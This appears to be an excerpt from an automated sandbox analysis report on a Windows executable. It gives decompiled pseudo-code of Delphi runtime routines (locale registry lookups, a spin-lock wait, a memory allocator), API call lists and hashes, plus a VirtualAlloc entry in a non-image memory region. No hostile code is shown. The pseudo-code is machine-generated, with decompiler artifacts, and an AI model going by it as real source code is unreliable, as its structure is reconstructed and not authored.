                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040924E
                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040926C
                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040928A
                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 004092A8
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00409394,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,004093B1), ref: 004092E8
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,00409394,?,80000001), ref: 00409313
                                                • RegCloseKey.ADVAPI32(?,0040939B,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,00409394,?,80000001,Software\Embarcadero\Locales), ref: 0040938E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Open$QueryValue$CloseFileModuleName
                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                • API String ID: 2701450724-3496071916
                                                • Opcode ID: f5904ab30cac741b4ef6d492028240753c3d0504ac5ccb69b28adc174c7229e0
                                                • Instruction ID: 454187ae786063e5553441e2319b604b82b232e66815bb2dbe82f88c2e36da2d
                                                • Opcode Fuzzy Hash: f5904ab30cac741b4ef6d492028240753c3d0504ac5ccb69b28adc174c7229e0
                                                • Instruction Fuzzy Hash: 60512375A4020DBEEB10EAA5CD46FAE73BCDB08704F50447BBA04F61C3D6B89E418A59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0077024D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID: cess$kernel32.dll
                                                • API String ID: 4275171209-1230238691
                                                • Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                                                • Instruction ID: 61fea845af4cb53fdcf21fd180de3cee558ae144cb8e06e91107be009a9b22a9
                                                • Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                                                • Instruction Fuzzy Hash: 63526874A00229DFDB64CF68C985BA8BBB1BF09304F1480D9E90DAB351DB34AE95DF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 88%
                                                			E004058A8(signed char* __eax, void* __edx, void* __eflags) {
                                                				void* _t49;
                                                				signed char _t56;
                                                				intOrPtr _t57;
                                                				signed char _t59;
                                                				void* _t70;
                                                				signed char* _t71;
                                                				intOrPtr _t72;
                                                				signed char* _t73;
                                                
                                                				_t70 = __edx;
                                                				_t71 = __eax;
                                                				_t72 =  *((intOrPtr*)(__eax + 0x10));
                                                				while(1) {
                                                					L1:
                                                					 *_t73 = E00405D34(_t71);
                                                					if( *_t73 != 0 || _t70 == 0) {
                                                						break;
                                                					}
                                                					_t73[1] = 0;
                                                					if(_t72 <= 0) {
                                                						while(1) {
                                                							L17:
                                                							_t56 =  *_t71;
                                                							if(_t56 == 0) {
                                                								goto L1;
                                                							}
                                                							asm("lock cmpxchg [esi], edx");
                                                							if(_t56 != _t56) {
                                                								continue;
                                                							} else {
                                                								goto L19;
                                                							}
                                                							do {
                                                								L19:
                                                								_t73[4] = GetTickCount();
                                                								E00405AA0(_t71);
                                                								_t57 =  *0x5008f4; // 0x4fe4c8
                                                								 *((intOrPtr*)(_t57 + 0x10))();
                                                								 *_t73 = 0 == 0;
                                                								if(_t70 != 0xffffffff) {
                                                									_t73[8] = GetTickCount();
                                                									if(_t70 <= _t73[8] - _t73[4]) {
                                                										_t70 = 0;
                                                									} else {
                                                										_t70 = _t70 - _t73[8] - _t73[4];
                                                									}
                                                								}
                                                								if( *_t73 == 0) {
                                                									do {
                                                										asm("lock cmpxchg [esi], edx");
                                                									} while ( *_t71 !=  *_t71);
                                                									_t73[1] = 1;
                                                								} else {
                                                									while(1) {
                                                										_t59 =  *_t71;
                                                										if((_t59 & 0x00000001) != 0) {
                                                											goto L29;
                                                										}
                                                										asm("lock cmpxchg [esi], edx");
                                                										if(_t59 != _t59) {
                                                											continue;
                                                										}
                                                										_t73[1] = 1;
                                                										goto L29;
                                                									}
                                                								}
                                                								L29:
                                                							} while (_t73[1] == 0);
                                                							if( *_t73 != 0) {
                                                								_t71[8] = GetCurrentThreadId();
                                                								_t71[4] = 1;
                                                							}
                                                							goto L32;
                                                						}
                                                						continue;
                                                					}
                                                					_t73[4] = GetTickCount();
                                                					_t73[0xc] = 0;
                                                					if(_t72 <= 0) {
                                                						L13:
                                                						if(_t70 == 0xffffffff) {
                                                							goto L17;
                                                						}
                                                						_t73[8] = GetTickCount();
                                                						_t49 = _t73[8] - _t73[4];
                                                						if(_t70 > _t49) {
                                                							_t70 = _t70 - _t49;
                                                							goto L17;
                                                						}
                                                						 *_t73 = 0;
                                                						break;
                                                					}
                                                					L5:
                                                					L5:
                                                					if(_t70 == 0xffffffff || _t70 > GetTickCount() - _t73[4]) {
                                                						goto L8;
                                                					} else {
                                                						 *_t73 = 0;
                                                					}
                                                					break;
                                                					L8:
                                                					if( *_t71 > 1) {
                                                						goto L13;
                                                					}
                                                					if( *_t71 != 0) {
                                                						L12:
                                                						E00405564( &(_t73[0xc]));
                                                						_t72 = _t72 - 1;
                                                						if(_t72 > 0) {
                                                							goto L5;
                                                						}
                                                						goto L13;
                                                					}
                                                					asm("lock cmpxchg [esi], edx");
                                                					if(0 != 0) {
                                                						goto L12;
                                                					}
                                                					_t71[8] = GetCurrentThreadId();
                                                					_t71[4] = 1;
                                                					 *_t73 = 1;
                                                					break;
                                                				}
                                                				L32:
                                                				return  *_t73 & 0x000000ff;
                                                			}











                                                0x004058af
                                                0x004058b1
                                                0x004058b3
                                                0x004058b6
                                                0x004058b6
                                                0x004058bd
                                                0x004058c4
                                                0x00000000
                                                0x00000000
                                                0x004058d2
                                                0x004058d9
                                                0x00405971
                                                0x00405971
                                                0x00405971
                                                0x00405975
                                                0x00000000
                                                0x00000000
                                                0x00405980
                                                0x00405986
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405988
                                                0x00405988
                                                0x0040598d
                                                0x00405993
                                                0x0040599a
                                                0x004059a4
                                                0x004059a9
                                                0x004059b0
                                                0x004059b7
                                                0x004059c5
                                                0x004059d3
                                                0x004059c7
                                                0x004059cf
                                                0x004059cf
                                                0x004059c5
                                                0x004059d9
                                                0x004059fb
                                                0x00405a04
                                                0x00405a08
                                                0x00405a0c
                                                0x00000000
                                                0x004059db
                                                0x004059db
                                                0x004059e0
                                                0x00000000
                                                0x00000000
                                                0x004059ec
                                                0x004059f2
                                                0x00000000
                                                0x00000000
                                                0x004059f4
                                                0x00000000
                                                0x004059f4
                                                0x004059db
                                                0x00405a11
                                                0x00405a11
                                                0x00405a20
                                                0x00405a27
                                                0x00405a2a
                                                0x00405a2a
                                                0x00000000
                                                0x00405a20
                                                0x00000000
                                                0x00405971
                                                0x004058e4
                                                0x004058ea
                                                0x004058f0
                                                0x0040594c
                                                0x0040594f
                                                0x00000000
                                                0x00000000
                                                0x00405956
                                                0x0040595e
                                                0x00405964
                                                0x0040596f
                                                0x00000000
                                                0x0040596f
                                                0x00405966
                                                0x00000000
                                                0x00405966
                                                0x00000000
                                                0x004058f2
                                                0x004058f5
                                                0x00000000
                                                0x00405904
                                                0x00405904
                                                0x00405904
                                                0x00000000
                                                0x0040590d
                                                0x00405910
                                                0x00000000
                                                0x00000000
                                                0x00405915
                                                0x0040593e
                                                0x00405942
                                                0x00405947
                                                0x0040594a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040594a
                                                0x0040591e
                                                0x00405924
                                                0x00000000
                                                0x00000000
                                                0x0040592b
                                                0x0040592e
                                                0x00405935
                                                0x00000000
                                                0x00405935
                                                0x00405a31
                                                0x00405a3c

                                                APIs
                                                  • Part of subcall function 00405D34: GetCurrentThreadId.KERNEL32 ref: 00405D37
                                                • GetTickCount.KERNEL32 ref: 004058DF
                                                • GetTickCount.KERNEL32 ref: 004058F7
                                                • GetCurrentThreadId.KERNEL32 ref: 00405926
                                                • GetTickCount.KERNEL32 ref: 00405951
                                                • GetTickCount.KERNEL32 ref: 00405988
                                                • GetTickCount.KERNEL32 ref: 004059B2
                                                • GetCurrentThreadId.KERNEL32 ref: 00405A22
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CountTick$CurrentThread
                                                • String ID: ]fOzfO
                                                • API String ID: 3968769311-1484066218
                                                • Opcode ID: bf3ba3bf5d0d1e4ac3ab4d6b20b77107c765a2c1294e60432f27748c811c1796
                                                • Instruction ID: f9e0b74dae2fd0dce5a8ccb706f8281a6c5d2711acfe29b67af50c63a209dd9d
                                                • Opcode Fuzzy Hash: bf3ba3bf5d0d1e4ac3ab4d6b20b77107c765a2c1294e60432f27748c811c1796
                                                • Instruction Fuzzy Hash: 37417D71208B819FD721AE39C58471FBBD1EB81364F148A3EE4D8972C1E678C881CF5A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 67%
                                                			E00402FAC(signed int __eax) {
                                                				signed int __ebx;
                                                				signed int __edi;
                                                				signed int __esi;
                                                				void* _t96;
                                                				void** _t99;
                                                				signed int _t104;
                                                				signed int _t109;
                                                				signed int _t110;
                                                				intOrPtr* _t114;
                                                				void* _t116;
                                                				void* _t121;
                                                				signed int _t125;
                                                				signed int _t129;
                                                				signed int _t131;
                                                				signed int _t132;
                                                				signed int _t133;
                                                				signed int _t134;
                                                				signed int _t135;
                                                				unsigned int _t141;
                                                				signed int _t142;
                                                				void* _t144;
                                                				void* _t147;
                                                				intOrPtr _t148;
                                                				signed int _t150;
                                                				long _t156;
                                                				intOrPtr _t159;
                                                				signed int _t162;
                                                
                                                				_t129 =  *0x500055; // 0x0
                                                				if(__eax > 0xa2c) {
                                                					__eflags = __eax - 0x40a2c;
                                                					if(__eax > 0x40a2c) {
                                                						_pop(_t120);
                                                						__eflags = __eax;
                                                						if(__eax >= 0) {
                                                							_push(_t120);
                                                							_t162 = __eax;
                                                							_t156 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000;
                                                							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed
                                                							_t121 = _t96;
                                                							if(_t121 != 0) {
                                                								_t147 = _t121;
                                                								 *((intOrPtr*)(_t147 + 8)) = _t162;
                                                								 *(_t147 + 0xc) = _t156 | 0x00000004;
                                                								E00402D0C();
                                                								_t99 =  *0x502b7c; // 0x502b78
                                                								 *_t147 = 0x502b78;
                                                								 *0x502b7c = _t121;
                                                								 *(_t147 + 4) = _t99;
                                                								 *_t99 = _t121;
                                                								 *0x502b74 = 0;
                                                								_t121 = _t121 + 0x10;
                                                							}
                                                							return _t121;
                                                						} else {
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                					} else {
                                                						_t125 = (__eax + 0x000000d3 & 0xffffff00) + 0x30;
                                                						__eflags = _t129;
                                                						if(__eflags != 0) {
                                                							while(1) {
                                                								asm("lock cmpxchg [0x500ae4], ah");
                                                								if(__eflags == 0) {
                                                									goto L42;
                                                								}
                                                								asm("pause");
                                                								__eflags =  *0x500985;
                                                								if(__eflags != 0) {
                                                									continue;
                                                								} else {
                                                									Sleep(0);
                                                									asm("lock cmpxchg [0x500ae4], ah");
                                                									if(__eflags != 0) {
                                                										Sleep(0xa);
                                                										continue;
                                                									}
                                                								}
                                                								goto L42;
                                                							}
                                                						}
                                                						L42:
                                                						_t141 = _t125 - 0xb30;
                                                						_t142 = _t141 >> 0xd;
                                                						_t131 = _t141 >> 8;
                                                						_t104 = 0xffffffff << _t131 &  *(0x500af4 + _t142 * 4);
                                                						__eflags = 0xffffffff;
                                                						if(0xffffffff == 0) {
                                                							_t132 = _t142;
                                                							__eflags = 0xfffffffe << _t132 &  *0x500af0;
                                                							if((0xfffffffe << _t132 &  *0x500af0) == 0) {
                                                								_t133 =  *0x500aec; // 0x0
                                                								_t134 = _t133 - _t125;
                                                								__eflags = _t134;
                                                								if(_t134 < 0) {
                                                									_t109 = E00402C90(_t125);
                                                								} else {
                                                									_t110 =  *0x500ae8; // 0x26347f0
                                                									_t109 = _t110 - _t125;
                                                									 *0x500ae8 = _t109;
                                                									 *0x500aec = _t134;
                                                									 *(_t109 - 4) = _t125 | 0x00000002;
                                                								}
                                                								 *0x500ae4 = 0;
                                                								return _t109;
                                                							} else {
                                                								asm("bsf edx, eax");
                                                								asm("bsf ecx, eax");
                                                								_t135 = _t132 | _t142 << 0x00000005;
                                                								goto L50;
                                                							}
                                                						} else {
                                                							asm("bsf eax, eax");
                                                							_t135 = _t131 & 0xffffffe0 | _t104;
                                                							L50:
                                                							_push(_t152);
                                                							_push(_t145);
                                                							_t148 = 0x500b74 + _t135 * 8;
                                                							_t159 =  *((intOrPtr*)(_t148 + 4));
                                                							_t114 =  *((intOrPtr*)(_t159 + 4));
                                                							 *((intOrPtr*)(_t148 + 4)) = _t114;
                                                							 *_t114 = _t148;
                                                							__eflags = _t148 - _t114;
                                                							if(_t148 == _t114) {
                                                								asm("rol eax, cl");
                                                								_t80 = 0x500af4 + _t142 * 4;
                                                								 *_t80 =  *(0x500af4 + _t142 * 4) & 0xfffffffe;
                                                								__eflags =  *_t80;
                                                								if( *_t80 == 0) {
                                                									asm("btr [0x500af0], edx");
                                                								}
                                                							}
                                                							_t150 = 0xfffffff0 &  *(_t159 - 4);
                                                							_t144 = 0xfffffff0 - _t125;
                                                							__eflags = 0xfffffff0;
                                                							if(0xfffffff0 == 0) {
                                                								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
                                                								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
                                                								__eflags =  *_t89;
                                                							} else {
                                                								_t116 = _t125 + _t159;
                                                								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
                                                								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
                                                								__eflags = 0xfffffff0 - 0xb30;
                                                								if(0xfffffff0 >= 0xb30) {
                                                									E00402BC4(_t116, 0xfffffffffffffff3, _t144);
                                                								}
                                                							}
                                                							 *(_t159 - 4) = _t125 + 2;
                                                							 *0x500ae4 = 0;
                                                							return _t159;
                                                						}
                                                					}
                                                				} else {
                                                					__eflags = __cl;
                                                					__eax =  *(__edx + 0x50098c) & 0x000000ff;
                                                					__ebx = 0x4fd064 + ( *(__edx + 0x50098c) & 0x000000ff) * 8;
                                                					if(__eflags != 0) {
                                                						while(1) {
                                                							__eax = 0x100;
                                                							asm("lock cmpxchg [ebx], ah");
                                                							if(__eflags == 0) {
                                                								goto L5;
                                                							}
                                                							__ebx = __ebx + 0x20;
                                                							__eflags = __ebx;
                                                							__eax = 0x100;
                                                							asm("lock cmpxchg [ebx], ah");
                                                							if(__ebx != 0) {
                                                								__ebx = __ebx + 0x20;
                                                								__eflags = __ebx;
                                                								__eax = 0x100;
                                                								asm("lock cmpxchg [ebx], ah");
                                                								if(__ebx != 0) {
                                                									__ebx = __ebx - 0x40;
                                                									asm("pause");
                                                									__eflags =  *0x500985;
                                                									if(__eflags != 0) {
                                                										continue;
                                                									} else {
                                                										Sleep(0);
                                                										__eax = 0x100;
                                                										asm("lock cmpxchg [ebx], ah");
                                                										if(__eflags != 0) {
                                                											Sleep(0xa);
                                                											continue;
                                                										}
                                                									}
                                                								}
                                                							}
                                                							goto L5;
                                                						}
                                                					}
                                                					L5:
                                                					__edx =  *(__ebx + 8);
                                                					_t10 = __edx + 0x10; // 0xdbf71273
                                                					__eax =  *_t10;
                                                					__ecx = 0xfffffff8;
                                                					__eflags = __edx - __ebx;
                                                					if(__edx == __ebx) {
                                                						__edx =  *(__ebx + 0x18);
                                                						__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
                                                						__eflags = __eax -  *(__ebx + 0x14);
                                                						if(__eax >  *(__ebx + 0x14)) {
                                                							_push(__esi);
                                                							_push(__edi);
                                                							__eflags =  *0x500055;
                                                							if(__eflags != 0) {
                                                								while(1) {
                                                									__eax = 0x100;
                                                									asm("lock cmpxchg [0x500ae4], ah");
                                                									if(__eflags == 0) {
                                                										goto L22;
                                                									}
                                                									asm("pause");
                                                									__eflags =  *0x500985;
                                                									if(__eflags != 0) {
                                                										continue;
                                                									} else {
                                                										Sleep(0);
                                                										__eax = 0x100;
                                                										asm("lock cmpxchg [0x500ae4], ah");
                                                										if(__eflags != 0) {
                                                											Sleep(0xa);
                                                											continue;
                                                										}
                                                									}
                                                									goto L22;
                                                								}
                                                							}
                                                							L22:
                                                							 *(__ebx + 1) =  *(__ebx + 1) &  *0x500af0;
                                                							__eflags =  *(__ebx + 1) &  *0x500af0;
                                                							if(( *(__ebx + 1) &  *0x500af0) == 0) {
                                                								__ecx =  *(__ebx + 4) & 0x0000ffff;
                                                								__edi =  *0x500aec; // 0x0
                                                								__eflags = __edi - ( *(__ebx + 4) & 0x0000ffff);
                                                								if(__edi < ( *(__ebx + 4) & 0x0000ffff)) {
                                                									__eax =  *(__ebx + 6) & 0x0000ffff;
                                                									__edi = __eax;
                                                									__eax = E00402C90(__eax);
                                                									__esi = __eax;
                                                									__eflags = __eax;
                                                									if(__eax != 0) {
                                                										goto L35;
                                                									} else {
                                                										 *0x500ae4 = __al;
                                                										 *__ebx = __al;
                                                										_pop(__edi);
                                                										_pop(__esi);
                                                										_pop(__ebx);
                                                										return __eax;
                                                									}
                                                								} else {
                                                									__esi =  *0x500ae8; // 0x26347f0
                                                									__ecx =  *(__ebx + 6) & 0x0000ffff;
                                                									__edx = __ecx + 0xb30;
                                                									__eflags = __edi - __ecx + 0xb30;
                                                									if(__edi >= __ecx + 0xb30) {
                                                										__edi = __ecx;
                                                									}
                                                									__esi = __esi - __edi;
                                                									 *0x500aec =  *0x500aec - __edi;
                                                									 *0x500ae8 = __esi;
                                                									goto L35;
                                                								}
                                                							} else {
                                                								asm("bsf eax, esi");
                                                								__esi = __eax * 8;
                                                								__ecx =  *(0x500af4 + __eax * 4);
                                                								asm("bsf ecx, ecx");
                                                								__ecx =  *(0x500af4 + __eax * 4) + __eax * 8 * 4;
                                                								__edi = 0x500b74 + ( *(0x500af4 + __eax * 4) + __eax * 8 * 4) * 8;
                                                								__esi =  *(__edi + 4);
                                                								__edx =  *(__esi + 4);
                                                								 *(__edi + 4) = __edx;
                                                								 *__edx = __edi;
                                                								__eflags = __edi - __edx;
                                                								if(__edi == __edx) {
                                                									__edx = 0xfffffffe;
                                                									asm("rol edx, cl");
                                                									_t38 = 0x500af4 + __eax * 4;
                                                									 *_t38 =  *(0x500af4 + __eax * 4) & 0xfffffffe;
                                                									__eflags =  *_t38;
                                                									if( *_t38 == 0) {
                                                										asm("btr [0x500af0], eax");
                                                									}
                                                								}
                                                								__edi = 0xfffffff0;
                                                								__edi = 0xfffffff0 &  *(__esi - 4);
                                                								__eflags = 0xfffffff0 - 0x10a60;
                                                								if(0xfffffff0 < 0x10a60) {
                                                									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
                                                									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
                                                									__eflags =  *_t52;
                                                								} else {
                                                									__edx = __edi;
                                                									__edi =  *(__ebx + 6) & 0x0000ffff;
                                                									__edx = __edx - __edi;
                                                									__eax = __edi + __esi;
                                                									__ecx = __edx + 3;
                                                									 *(__eax - 4) = __ecx;
                                                									 *(__edx + __eax - 8) = __edx;
                                                									__eax = E00402BC4(__eax, __ecx, __edx);
                                                								}
                                                								L35:
                                                								_t56 = __edi + 6; // 0x6
                                                								__ecx = _t56;
                                                								 *(__esi - 4) = _t56;
                                                								__eax = 0;
                                                								 *0x500ae4 = __al;
                                                								 *__esi = __ebx;
                                                								 *((intOrPtr*)(__esi + 0x10)) = 0;
                                                								 *((intOrPtr*)(__esi + 0x14)) = 1;
                                                								 *(__ebx + 0x18) = __esi;
                                                								_t61 = __esi + 0x20; // 0x2634810
                                                								__eax = _t61;
                                                								__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                								__edx = __ecx + __eax;
                                                								 *(__ebx + 0x10) = __ecx + __eax;
                                                								__edi = __edi + __esi;
                                                								__edi = __edi - __ecx;
                                                								__eflags = __edi;
                                                								 *(__ebx + 0x14) = __edi;
                                                								 *__ebx = 0;
                                                								 *(__eax - 4) = __esi;
                                                								_pop(__edi);
                                                								_pop(__esi);
                                                								_pop(__ebx);
                                                								return __eax;
                                                							}
                                                						} else {
                                                							_t19 = __edx + 0x14;
                                                							 *_t19 =  *(__edx + 0x14) + 1;
                                                							__eflags =  *_t19;
                                                							 *(__ebx + 0x10) = __ecx;
                                                							 *__ebx = 0;
                                                							 *(__eax - 4) = __edx;
                                                							_pop(__ebx);
                                                							return __eax;
                                                						}
                                                					} else {
                                                						 *(__edx + 0x14) =  *(__edx + 0x14) + 1;
                                                						__ecx = 0xfffffff8 &  *(__eax - 4);
                                                						__eflags = 0xfffffff8;
                                                						 *(__edx + 0x10) = 0xfffffff8 &  *(__eax - 4);
                                                						 *(__eax - 4) = __edx;
                                                						if(0xfffffff8 == 0) {
                                                							_t23 = __edx + 8; // 0xfb81cb09
                                                							__ecx =  *_t23;
                                                							 *(__ecx + 0xc) = __ebx;
                                                							 *(__ebx + 8) = __ecx;
                                                							 *__ebx = 0;
                                                							_pop(__ebx);
                                                							return __eax;
                                                						} else {
                                                							 *__ebx = 0;
                                                							_pop(__ebx);
                                                							return __eax;
                                                						}
                                                					}
                                                				}
                                                			}






























                                                0x00402fb8
                                                0x00402fbe
                                                0x0040320c
                                                0x00403211
                                                0x00403324
                                                0x00403325
                                                0x00403327
                                                0x00402d58
                                                0x00402d5c
                                                0x00402d68
                                                0x00402d78
                                                0x00402d7d
                                                0x00402d81
                                                0x00402d83
                                                0x00402d85
                                                0x00402d8b
                                                0x00402d8e
                                                0x00402d93
                                                0x00402d98
                                                0x00402d9e
                                                0x00402da4
                                                0x00402da7
                                                0x00402da9
                                                0x00402db0
                                                0x00402db0
                                                0x00402db9
                                                0x0040332d
                                                0x0040332d
                                                0x0040332f
                                                0x0040332f
                                                0x00403217
                                                0x00403223
                                                0x00403226
                                                0x00403228
                                                0x004031d0
                                                0x004031d5
                                                0x004031dd
                                                0x00000000
                                                0x00000000
                                                0x004031df
                                                0x004031e1
                                                0x004031e8
                                                0x00000000
                                                0x004031ea
                                                0x004031ec
                                                0x004031f6
                                                0x004031fe
                                                0x00403202
                                                0x00000000
                                                0x00403202
                                                0x004031fe
                                                0x00000000
                                                0x004031e8
                                                0x004031d0
                                                0x0040322a
                                                0x0040322a
                                                0x00403232
                                                0x00403235
                                                0x0040323f
                                                0x0040323f
                                                0x00403246
                                                0x00403259
                                                0x0040325d
                                                0x00403263
                                                0x0040327c
                                                0x00403282
                                                0x00403282
                                                0x00403284
                                                0x004032a2
                                                0x00403286
                                                0x00403286
                                                0x0040328b
                                                0x0040328d
                                                0x00403292
                                                0x0040329b
                                                0x0040329b
                                                0x004032a7
                                                0x004032af
                                                0x00403265
                                                0x00403265
                                                0x0040326f
                                                0x00403277
                                                0x00000000
                                                0x00403277
                                                0x00403248
                                                0x0040324b
                                                0x0040324e
                                                0x004032b0
                                                0x004032b0
                                                0x004032b1
                                                0x004032b2
                                                0x004032b9
                                                0x004032bc
                                                0x004032bf
                                                0x004032c2
                                                0x004032c4
                                                0x004032c6
                                                0x004032cd
                                                0x004032cf
                                                0x004032cf
                                                0x004032cf
                                                0x004032d6
                                                0x004032d8
                                                0x004032d8
                                                0x004032d6
                                                0x004032e4
                                                0x004032e9
                                                0x004032e9
                                                0x004032eb
                                                0x0040330c
                                                0x0040330c
                                                0x0040330c
                                                0x004032ed
                                                0x004032ed
                                                0x004032f3
                                                0x004032f6
                                                0x004032fa
                                                0x00403300
                                                0x00403302
                                                0x00403302
                                                0x00403300
                                                0x00403314
                                                0x00403317
                                                0x00403323
                                                0x00403323
                                                0x00403246
                                                0x00402fc4
                                                0x00402fc4
                                                0x00402fc6
                                                0x00402fcd
                                                0x00402fd4
                                                0x0040302c
                                                0x0040302c
                                                0x00403031
                                                0x00403035
                                                0x00000000
                                                0x00000000
                                                0x00403037
                                                0x00403037
                                                0x0040303a
                                                0x0040303f
                                                0x00403043
                                                0x00403045
                                                0x00403045
                                                0x00403048
                                                0x0040304d
                                                0x00403051
                                                0x00403053
                                                0x00403056
                                                0x00403058
                                                0x0040305f
                                                0x00000000
                                                0x00403061
                                                0x00403063
                                                0x00403068
                                                0x0040306d
                                                0x00403071
                                                0x00403079
                                                0x00000000
                                                0x00403079
                                                0x00403071
                                                0x0040305f
                                                0x00403051
                                                0x00000000
                                                0x00403043
                                                0x0040302c
                                                0x00402fd6
                                                0x00402fd6
                                                0x00402fd9
                                                0x00402fd9
                                                0x00402fdc
                                                0x00402fe1
                                                0x00402fe3
                                                0x00402ffc
                                                0x00402fff
                                                0x00403003
                                                0x00403005
                                                0x00403008
                                                0x00403080
                                                0x00403081
                                                0x00403082
                                                0x00403089
                                                0x0040308b
                                                0x0040308b
                                                0x00403090
                                                0x00403098
                                                0x00000000
                                                0x00000000
                                                0x0040309a
                                                0x0040309c
                                                0x004030a3
                                                0x00000000
                                                0x004030a5
                                                0x004030a7
                                                0x004030ac
                                                0x004030b1
                                                0x004030b9
                                                0x004030bd
                                                0x00000000
                                                0x004030bd
                                                0x004030b9
                                                0x00000000
                                                0x004030a3
                                                0x0040308b
                                                0x004030c4
                                                0x004030c8
                                                0x004030c8
                                                0x004030ce
                                                0x00403140
                                                0x00403144
                                                0x0040314a
                                                0x0040314c
                                                0x00403174
                                                0x00403178
                                                0x0040317a
                                                0x0040317f
                                                0x00403181
                                                0x00403183
                                                0x00000000
                                                0x00403185
                                                0x00403185
                                                0x0040318a
                                                0x0040318c
                                                0x0040318d
                                                0x0040318e
                                                0x0040318f
                                                0x0040318f
                                                0x0040314e
                                                0x0040314e
                                                0x00403154
                                                0x00403158
                                                0x0040315e
                                                0x00403160
                                                0x00403162
                                                0x00403162
                                                0x00403164
                                                0x00403166
                                                0x0040316c
                                                0x00000000
                                                0x0040316c
                                                0x004030d0
                                                0x004030d0
                                                0x004030d3
                                                0x004030da
                                                0x004030e1
                                                0x004030e4
                                                0x004030e7
                                                0x004030ee
                                                0x004030f1
                                                0x004030f4
                                                0x004030f7
                                                0x004030f9
                                                0x004030fb
                                                0x004030fd
                                                0x00403102
                                                0x00403104
                                                0x00403104
                                                0x00403104
                                                0x0040310b
                                                0x0040310d
                                                0x0040310d
                                                0x0040310b
                                                0x00403114
                                                0x00403119
                                                0x0040311c
                                                0x00403122
                                                0x00403190
                                                0x00403190
                                                0x00403190
                                                0x00403124
                                                0x00403124
                                                0x00403126
                                                0x0040312a
                                                0x0040312c
                                                0x0040312f
                                                0x00403132
                                                0x00403135
                                                0x00403139
                                                0x00403139
                                                0x00403195
                                                0x00403195
                                                0x00403195
                                                0x00403198
                                                0x0040319b
                                                0x0040319d
                                                0x004031a2
                                                0x004031a4
                                                0x004031a7
                                                0x004031ae
                                                0x004031b1
                                                0x004031b1
                                                0x004031b4
                                                0x004031b8
                                                0x004031bb
                                                0x004031be
                                                0x004031c0
                                                0x004031c0
                                                0x004031c2
                                                0x004031c5
                                                0x004031c8
                                                0x004031cb
                                                0x004031cc
                                                0x004031cd
                                                0x004031ce
                                                0x004031ce
                                                0x0040300a
                                                0x0040300a
                                                0x0040300a
                                                0x0040300a
                                                0x0040300e
                                                0x00403011
                                                0x00403014
                                                0x00403017
                                                0x00403018
                                                0x00403018
                                                0x00402fe5
                                                0x00402fe5
                                                0x00402fe9
                                                0x00402fe9
                                                0x00402fec
                                                0x00402fef
                                                0x00402ff2
                                                0x0040301c
                                                0x0040301c
                                                0x0040301f
                                                0x00403022
                                                0x00403025
                                                0x00403028
                                                0x00403029
                                                0x00402ff4
                                                0x00402ff4
                                                0x00402ff7
                                                0x00402ff8
                                                0x00402ff8
                                                0x00402ff2
                                                0x00402fe3

                                                APIs
                                                • Sleep.KERNEL32(00000000,?,0040384C), ref: 00403063
                                                • Sleep.KERNEL32(0000000A,00000000,?,0040384C), ref: 00403079
                                                • Sleep.KERNEL32(00000000,?,?,?,0040384C), ref: 004030A7
